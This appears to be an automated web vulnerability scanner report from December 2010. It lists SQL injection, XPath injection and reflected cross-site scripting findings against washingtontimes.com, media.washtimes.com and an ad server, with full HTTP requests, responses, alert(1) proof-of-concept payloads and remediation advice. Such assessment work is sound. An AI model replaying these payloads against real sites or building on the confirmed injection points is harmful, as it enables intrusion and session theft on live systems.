<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"><head><title> Error | ...[SNIP]... <a href="/news/2010/dec/12/amtrak-exec-vincent-gray-controversial-firing/" onClick="_gaq.push(['_trackEvent', 'Hilighted', 'pullquote', 'position1']);trackclick(this);return false;">An Amtrak executive heading Gray's transition team is connected with the controversial dismissal of a former Amtrak inspector general.</a><img src="http://media.washtimes.com/static/images/quote-close.gif" height="13" width="17" alt="quote" class="pt ml min"/></h3><p class="ra"><a href="/staff/jim-mcelhatton/">Jim McElhatton</a></p></blockquote></div><ul class="full nav primary"><li id="menu_news"><a href="/" title="News">News</a></li><li id="menu_opinion"><a href="/opinion/" title="Opinion">Opinion</a></li><li id="menu_sports"><a href="/sports/" title="Sports">Sports</a></li><li id="menu_culture"><a href="/culture/" title="Culture">Culture</a></li><li id="menu_books"><a href="/books/" title="Books">Books</a></li><li id="menu_blogs"><a href="/blog/" title="Blogs">Blogs</a></li><li id="menu_communities"><a href="http://communities.washingtontimes.com" title="Communities">Communities</a></li><li id="menu_multimedia"><a href="/multimedia/" title="Multimedia">Multimedia</a></li><li class="right" style="padding:4px 0 0 0; float:right; margin:0 5px;"><div id="search" class="left pb pt extramin"><form action="http://www.washingtontimes.com/search/" id="cse-search-box"><div><input type="hidden" name="cx" value="015385541671335030271:nfb7f1nj88q" /><input type="hidden" name="cof" value="FORID:11" /><input type="hidden" name="ie" value="UTF-8" /><input type="text" name="q" size="20" /><input type="submit" name="sa" value="Search" class="ml"/></div></form><script type="text/javascript" src="http://www.google.com/coop/cse/brand?form=cse-search-box&lang=en"></script></div></li></ul><ul class="full nav secondary dnone hover" id="submenu_news"><li class=""><a href="/news/national/" title="National">National</a></li><li class=""><a href="/news/world/" title="World">World</a></li><li class=""><a href="/news/politics/" title ...[SNIP]...
Request 2
GET /video/white-house-minute11145785'%20or%201%3d2--%20/ HTTP/1.1 Host: www.washingtontimes.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response 2
HTTP/1.1 404 NOT FOUND Server: Apache/2.2.14 (Ubuntu) Vary: Accept-Encoding Content-Type: text/html; charset=utf-8 Content-Length: 14459 Date: Mon, 13 Dec 2010 21:38:41 GMT X-Varnish: 570591896 Age: 0 Via: 1.1 varnish Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"><head><title> Error | ...[SNIP]... <a href="/news/2010/dec/12/pakistani-forces-hamper-embassy/" onClick="_gaq.push(['_trackEvent', 'Hilighted', 'pullquote', 'position1']);trackclick(this);return false;">Pakistan's military and intelligence service took the action of going to war against the U.S. Embassy in Islamabad.</a><img src="http://media.washtimes.com/static/images/quote-close.gif" height="13" width="17" alt="quote" class="pt ml min"/></h3><p class="ra"><a href="/staff/rowan-scarborough/">Rowan Scarborough</a></p></blockquote></div><ul class="full nav primary"><li id="menu_news"><a href="/" title="News">News</a></li><li id="menu_opinion"><a href="/opinion/" title="Opinion">Opinion</a></li><li id="menu_sports"><a href="/sports/" title="Sports">Sports</a></li><li id="menu_culture"><a href="/culture/" title="Culture">Culture</a></li><li id="menu_books"><a href="/books/" title="Books">Books</a></li><li id="menu_blogs"><a href="/blog/" title="Blogs">Blogs</a></li><li id="menu_communities"><a href="http://communities.washingtontimes.com" title="Communities">Communities</a></li><li id="menu_multimedia"><a href="/multimedia/" title="Multimedia">Multimedia</a></li><li class="right" style="padding:4px 0 0 0; float:right; margin:0 5px;"><div id="search" class="left pb pt extramin"><form action="http://www.washingtontimes.com/search/" id="cse-search-box"><div><input type="hidden" name="cx" value="015385541671335030271:nfb7f1nj88q" /><input type="hidden" name="cof" value="FORID:11" /><input type="hidden" name="ie" value="UTF-8" /><input type="text" name="q" size="20" /><input type="submit" name="sa" value="Search" class="ml"/></div></form><script type="text/javascript" src="http://www.google.com/coop/cse/brand?form=cse-search-box&lang=en"></script></div></li></ul><ul class="full nav secondary dnone hover" id="submenu_news"><li class=""><a href="/news/national/" title="National">National</a></li><li class=""><a href="/news/world/" title="World">World</a></li><li class=""><a href="/news/politics/" title="Politics">Politics</a></l ...[SNIP]...
2. XPath injectionpreviousnext There are 6 instances of this issue:
XPath injection vulnerabilities arise when user-controllable data is incorporated into XPath queries in an unsafe manner. An attacker can supply crafted input to break out of the data context in which their input appears and interfere with the structure of the surrounding query.
Depending on the purpose for which the vulnerable query is being used, an attacker may be able to exploit an XPath injection flaw to read sensitive application data or interfere with application logic.
Issue remediation
User input should be strictly validated before being incorporated into XPath queries. In most cases, it will be appropriate to accept input containing only short alhanumeric strings. At the very least, input containing any XPath metacharacters such as " ' / @ = * [ ] ( and ) should be rejected.
The REST URL parameter 1 appears to be vulnerable to XPath injection attacks. The payload %00' was submitted in the REST URL parameter 1, and an XPath error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
Request
GET /static%00'/js/global.js HTTP/1.1 Host: media.washtimes.com Proxy-Connection: keep-alive Referer: http://www.washingtontimes.com/ Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.215 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK <!--: spam Content-Type: text/html Date: Mon, 13 Dec 2010 21:22:28 GMT Server: lighttpd/1.4.26 Connection: close
The REST URL parameter 2 appears to be vulnerable to XPath injection attacks. The payload %00' was submitted in the REST URL parameter 2, and an XPath error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
Request
GET /static/js%00'/global.js HTTP/1.1 Host: media.washtimes.com Proxy-Connection: keep-alive Referer: http://www.washingtontimes.com/ Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.215 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK <!--: spam Content-Type: text/html Date: Mon, 13 Dec 2010 21:22:29 GMT Server: lighttpd/1.4.26 Connection: close
The REST URL parameter 3 appears to be vulnerable to XPath injection attacks. The payload %00' was submitted in the REST URL parameter 3, and an XPath error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
Request
GET /static/js/global.js%00' HTTP/1.1 Host: media.washtimes.com Proxy-Connection: keep-alive Referer: http://www.washingtontimes.com/ Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.215 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK <!--: spam Content-Type: text/html Date: Mon, 13 Dec 2010 21:22:30 GMT Server: lighttpd/1.4.26 Connection: close
The REST URL parameter 1 appears to be vulnerable to XPath injection attacks. The payload %00' was submitted in the REST URL parameter 1, and an XPath error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
Request
GET /static%00'/js/jquery.cookies.js HTTP/1.1 Host: media.washtimes.com Proxy-Connection: keep-alive Referer: http://www.washingtontimes.com/ Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.215 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK <!--: spam Content-Type: text/html Date: Mon, 13 Dec 2010 21:22:28 GMT Server: lighttpd/1.4.26 Connection: close
The REST URL parameter 2 appears to be vulnerable to XPath injection attacks. The payload %00' was submitted in the REST URL parameter 2, and an XPath error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
Request
GET /static/js%00'/jquery.cookies.js HTTP/1.1 Host: media.washtimes.com Proxy-Connection: keep-alive Referer: http://www.washingtontimes.com/ Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.215 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK <!--: spam Content-Type: text/html Date: Mon, 13 Dec 2010 21:22:32 GMT Server: lighttpd/1.4.26 Connection: close
The REST URL parameter 3 appears to be vulnerable to XPath injection attacks. The payload %00' was submitted in the REST URL parameter 3, and an XPath error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
Request
GET /static/js/jquery.cookies.js%00' HTTP/1.1 Host: media.washtimes.com Proxy-Connection: keep-alive Referer: http://www.washingtontimes.com/ Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.215 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK <!--: spam Content-Type: text/html Date: Mon, 13 Dec 2010 21:22:34 GMT Server: lighttpd/1.4.26 Connection: close
Reflected cross-site scripting vulnerabilities arise when data is copied from a request and echoed into the application's immediate response in an unsafe way. An attacker can use the vulnerability to construct a request which, if issued by another application user, will cause JavaScript code supplied by the attacker to execute within the user's browser in the context of that user's session with the application.
The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes.
Users can be induced to issue the attacker's crafted request in various ways. For example, the attacker can send a victim a link containing a malicious URL in an email or instant message. They can submit the link to popular web sites that allow content authoring, for example in blog comments. And they can create an innocuous looking web site which causes anyone viewing it to make arbitrary cross-domain requests to the vulnerable application (using either the GET or the POST method).
The security impact of cross-site scripting vulnerabilities is dependent upon the nature of the vulnerable application, the kinds of data and functionality which it contains, and the other applications which belong to the same domain and organisation. If the application is used only to display non-sensitive public content, with no authentication or access control functionality, then a cross-site scripting flaw may be considered low risk. However, if the same application resides on a domain which can access cookies for other more security-critical applications, then the vulnerability could be used to attack those other applications, and so may be considered high risk. Similarly, if the organisation which owns the application is a likely target for phishing attacks, then the vulnerability could be leveraged to lend credibility to such attacks, by injecting Trojan functionality into the vulnerable application, and exploiting users' trust in the organisation in order to capture credentials for other applications which it owns. In many kinds of application, such as those providing online banking functionality, cross-site scripting should always be considered high risk.
Issue remediation
In most situations where user-controllable data is copied into application responses, cross-site scripting attacks can be prevented using two layers of defenses:
Input should be validated as strictly as possible on arrival, given the kind of content which it is expected to contain. For example, personal names should consist of alphabetical and a small range of typographical characters, and be relatively short; a year of birth should consist of exactly four numerals; email addresses should match a well-defined regular expression. Input which fails the validation should be rejected, not sanitised.
User input should be HTML-encoded at any point where it is copied into application responses. All HTML metacharacters, including < > " ' and =, should be replaced with the corresponding HTML entities (< > etc).
In cases where the application's functionality allows users to author content using a restricted subset of HTML tags and attributes (for example, blog comments which allow limited formatting and linking), it is necessary to parse the supplied HTML to validate that it does not use any dangerous syntax; this is a non-trivial task.
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload aa31c<script>alert(1)</script>ed828a88755 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /adaa31c<script>alert(1)</script>ed828a88755/q1.test/home HTTP/1.1 Host: a.collective-media.net Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: dc=dal-dc; optout=1; JY57=opt_out;
Response
HTTP/1.1 404 Not Found Server: nginx/0.7.65 Content-Type: text/html Content-Length: 70 Vary: Accept-Encoding Date: Mon, 13 Dec 2010 21:39:00 GMT Connection: close Set-Cookie: JY57=opt_out; expires=Wed, 22-Aug-2001 17:30:00 GMT; domain=.collective-media.net
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c45f9'-alert(1)-'ff4bef350e6 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adj/q1.testc45f9'-alert(1)-'ff4bef350e6/home;kw=additional_macys_adultpromo_washingtontimes_120910to121310;sz=160x600;click=http://ad.doubleclick.net/click%3Bh%3Dv8/3a6f/3/0/%2a/l%3B233354357%3B0-0%3B1%3B37858617%3B2321-160/600%3B39716168/39733955/1%3B%3B~sscs%3D%3f;ord=7575965? HTTP/1.1 Host: a.collective-media.net Proxy-Connection: keep-alive Referer: http://www.washingtontimes.com/ Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.215 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: optout=1; dc=dal-dc
Response
HTTP/1.1 200 OK Server: nginx/0.7.65 Content-Type: application/x-javascript P3P: policyref="http://www.collective.com/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE" Content-Length: 499 Date: Mon, 13 Dec 2010 21:23:36 GMT Connection: close Vary: Accept-Encoding Set-Cookie: dc=dal-dc; domain=collective-media.net; path=/; expires=Wed, 12-Jan-2011 21:23:36 GMT Set-Cookie: JY57=opt_out; expires=Wed, 22-Aug-2001 17:30:00 GMT; domain=.collective-media.net
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload bc06e'-alert(1)-'9ad47f86a1b was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adj/q1.test/homebc06e'-alert(1)-'9ad47f86a1b;kw=additional_macys_adultpromo_washingtontimes_120910to121310;sz=160x600;click=http://ad.doubleclick.net/click%3Bh%3Dv8/3a6f/3/0/%2a/l%3B233354357%3B0-0%3B1%3B37858617%3B2321-160/600%3B39716168/39733955/1%3B%3B~sscs%3D%3f;ord=7575965? HTTP/1.1 Host: a.collective-media.net Proxy-Connection: keep-alive Referer: http://www.washingtontimes.com/ Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.215 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: optout=1; dc=dal-dc
Response
HTTP/1.1 200 OK Server: nginx/0.7.65 Content-Type: application/x-javascript P3P: policyref="http://www.collective.com/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE" Content-Length: 499 Date: Mon, 13 Dec 2010 21:23:36 GMT Connection: close Vary: Accept-Encoding Set-Cookie: dc=dal-dc; domain=collective-media.net; path=/; expires=Wed, 12-Jan-2011 21:23:36 GMT Set-Cookie: JY57=opt_out; expires=Wed, 22-Aug-2001 17:30:00 GMT; domain=.collective-media.net
The value of the kw request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 3cfb2'-alert(1)-'4ea1f05b3e8 was submitted in the kw parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adj/q1.test/home;kw=additional_macys_adultpromo_washingtontimes_120910to121310;sz=160x600;click=http://ad.doubleclick.net/click%3Bh%3Dv8/3a6f/3/0/%2a/l%3B233354357%3B0-0%3B1%3B37858617%3B2321-160/600%3B39716168/39733955/1%3B%3B~sscs%3D%3f;ord=7575965?3cfb2'-alert(1)-'4ea1f05b3e8 HTTP/1.1 Host: a.collective-media.net Proxy-Connection: keep-alive Referer: http://www.washingtontimes.com/ Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.215 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: optout=1; dc=dal-dc
Response
HTTP/1.1 200 OK Server: nginx/0.7.65 Content-Type: application/x-javascript P3P: policyref="http://www.collective.com/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE" Content-Length: 500 Date: Mon, 13 Dec 2010 21:23:34 GMT Connection: close Vary: Accept-Encoding Set-Cookie: dc=dal-dc; domain=collective-media.net; path=/; expires=Wed, 12-Jan-2011 21:23:34 GMT Set-Cookie: JY57=opt_out; expires=Wed, 22-Aug-2001 17:30:00 GMT; domain=.collective-media.net
3.5. http://a.collective-media.net/adj/q1.test/home [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://a.collective-media.net
Path:
/adj/q1.test/home
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 2cd76'-alert(1)-'d748450ef4a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adj/q1.test/home;kw=additional_macys_adultpromo_washingtontimes_120910to121310;sz=160x600;click=http://ad.doubleclick.net/click%3Bh%3Dv8/3a6f/3/0/%2a/l%3B233354357%3B0-0%3B1%3B37858617%3B2321-160/600%3B39716168/39733955/1%3B%3B~sscs%3D%3f;ord=7575965?&2cd76'-alert(1)-'d748450ef4a=1 HTTP/1.1 Host: a.collective-media.net Proxy-Connection: keep-alive Referer: http://www.washingtontimes.com/ Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.215 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: optout=1; dc=dal-dc
Response
HTTP/1.1 200 OK Server: nginx/0.7.65 Content-Type: application/x-javascript P3P: policyref="http://www.collective.com/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE" Content-Length: 503 Date: Mon, 13 Dec 2010 21:23:35 GMT Connection: close Vary: Accept-Encoding Set-Cookie: dc=dal-dc; domain=collective-media.net; path=/; expires=Wed, 12-Jan-2011 21:23:35 GMT Set-Cookie: JY57=opt_out; expires=Wed, 22-Aug-2001 17:30:00 GMT; domain=.collective-media.net
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload a8f08'-alert(1)-'88782b9c971 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /cmadja8f08'-alert(1)-'88782b9c971/q1.test/home;kw=additional_macys_adultpromo_washingtontimes_120910to121310;sz=160x600;net=q1;ord=7575965;ord1=131729;cmpgurl=http%253A//www.washingtontimes.com/? HTTP/1.1 Host: a.collective-media.net Proxy-Connection: keep-alive Referer: http://www.washingtontimes.com/ Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.215 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: optout=1; dc=dal-dc
Response
HTTP/1.1 200 OK Server: nginx/0.7.65 Content-Type: application/x-javascript P3P: policyref="http://www.collective.com/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE" Vary: Accept-Encoding Date: Mon, 13 Dec 2010 21:23:39 GMT Connection: close Set-Cookie: JY57=opt_out; expires=Wed, 22-Aug-2001 17:30:00 GMT; domain=.collective-media.net Content-Length: 7199
function cmIV_(){var a=this;this.ts=null;this.tsV=null;this.te=null;this.teV=null;this.fV=false;this.fFV=false;this.fATF=false;this.nLg=0;this._ob=null;this._obi=null;this._id=null;this._ps=null;this. ...[SNIP]... <scr'+'ipt language="Javascript">CollectiveMedia.createAndAttachAd("q1-95227715_1292275419","http://ad.doubleclick.net/adja8f08'-alert(1)-'88782b9c971/q1.test/home;net=q1;u=,q1-95227715_1292275419,,Miscellaneous,;;kw=additional_macys_adultpromo_washingtontimes_120910to121310;cmw=owl;sz=160x600;net=q1;ord1=131729;contx=Miscellaneous;dc=d;btg=;ord=757 ...[SNIP]...
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 84a5b'-alert(1)-'35cfa1c342 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /cmadj/q1.test84a5b'-alert(1)-'35cfa1c342/home;kw=additional_macys_adultpromo_washingtontimes_120910to121310;sz=160x600;net=q1;ord=7575965;ord1=131729;cmpgurl=http%253A//www.washingtontimes.com/? HTTP/1.1 Host: a.collective-media.net Proxy-Connection: keep-alive Referer: http://www.washingtontimes.com/ Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.215 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: optout=1; dc=dal-dc
Response
HTTP/1.1 200 OK Server: nginx/0.7.65 Content-Type: application/x-javascript P3P: policyref="http://www.collective.com/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE" Vary: Accept-Encoding Date: Mon, 13 Dec 2010 21:23:39 GMT Connection: close Set-Cookie: JY57=opt_out; expires=Wed, 22-Aug-2001 17:30:00 GMT; domain=.collective-media.net Content-Length: 7190
function cmIV_(){var a=this;this.ts=null;this.tsV=null;this.te=null;this.teV=null;this.fV=false;this.fFV=false;this.fATF=false;this.nLg=0;this._ob=null;this._obi=null;this._id=null;this._ps=null;this. ...[SNIP]... <scr'+'ipt language="Javascript">CollectiveMedia.createAndAttachAd("q1-35825100_1292275419","http://ad.doubleclick.net/adj/q1.test84a5b'-alert(1)-'35cfa1c342/home;net=q1;u=,q1-35825100_1292275419,,Miscellaneous,;;kw=additional_macys_adultpromo_washingtontimes_120910to121310;sz=160x600;net=q1;ord1=131729;contx=Miscellaneous;dc=d;btg=;ord=7575965?","160","60 ...[SNIP]...
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 11f44'-alert(1)-'12f5b97a78e was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /cmadj/q1.test/home11f44'-alert(1)-'12f5b97a78e;kw=additional_macys_adultpromo_washingtontimes_120910to121310;sz=160x600;net=q1;ord=7575965;ord1=131729;cmpgurl=http%253A//www.washingtontimes.com/? HTTP/1.1 Host: a.collective-media.net Proxy-Connection: keep-alive Referer: http://www.washingtontimes.com/ Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.215 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: optout=1; dc=dal-dc
Response
HTTP/1.1 200 OK Server: nginx/0.7.65 Content-Type: application/x-javascript P3P: policyref="http://www.collective.com/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE" Vary: Accept-Encoding Date: Mon, 13 Dec 2010 21:23:39 GMT Connection: close Set-Cookie: JY57=opt_out; expires=Wed, 22-Aug-2001 17:30:00 GMT; domain=.collective-media.net Content-Length: 7191
function cmIV_(){var a=this;this.ts=null;this.tsV=null;this.te=null;this.teV=null;this.fV=false;this.fFV=false;this.fATF=false;this.nLg=0;this._ob=null;this._obi=null;this._id=null;this._ps=null;this. ...[SNIP]... <scr'+'ipt language="Javascript">CollectiveMedia.createAndAttachAd("q1-37895462_1292275419","http://ad.doubleclick.net/adj/q1.test/home11f44'-alert(1)-'12f5b97a78e;net=q1;u=,q1-37895462_1292275419,,Miscellaneous,;;kw=additional_macys_adultpromo_washingtontimes_120910to121310;sz=160x600;net=q1;ord1=131729;contx=Miscellaneous;dc=d;btg=;ord=7575965?","160","600",fa ...[SNIP]...
The value of the kw request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 95357'-alert(1)-'8587974a684 was submitted in the kw parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /cmadj/q1.test/home;kw=95357'-alert(1)-'8587974a684 HTTP/1.1 Host: a.collective-media.net Proxy-Connection: keep-alive Referer: http://www.washingtontimes.com/ Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.215 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: optout=1; dc=dal-dc
Response
HTTP/1.1 200 OK Server: nginx/0.7.65 Content-Type: application/x-javascript P3P: policyref="http://www.collective.com/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE" Vary: Accept-Encoding Date: Mon, 13 Dec 2010 21:23:37 GMT Connection: close Set-Cookie: JY57=opt_out; expires=Wed, 22-Aug-2001 17:30:00 GMT; domain=.collective-media.net Content-Length: 7069
function cmIV_(){var a=this;this.ts=null;this.tsV=null;this.te=null;this.teV=null;this.fV=false;this.fFV=false;this.fATF=false;this.nLg=0;this._ob=null;this._obi=null;this._id=null;this._ps=null;this. ...[SNIP]... <scr'+'ipt language="Javascript">CollectiveMedia.createAndAttachAd("q1-83672091_1292275417","http://ad.doubleclick.net/adj/q1.test/home;net=q1;u=,q1-83672091_1292275417,,none,;;kw=95357'-alert(1)-'8587974a684;contx=none;dc=d;btg=?","0","0",false);</scr'+'ipt> ...[SNIP]...
3.10. http://a.collective-media.net/cmadj/q1.test/home [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://a.collective-media.net
Path:
/cmadj/q1.test/home
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 42430'-alert(1)-'23afa6ec51c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /cmadj/q1.test/home?42430'-alert(1)-'23afa6ec51c=1 HTTP/1.1 Host: a.collective-media.net Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: dc=dal-dc; optout=1; JY57=opt_out;
Response
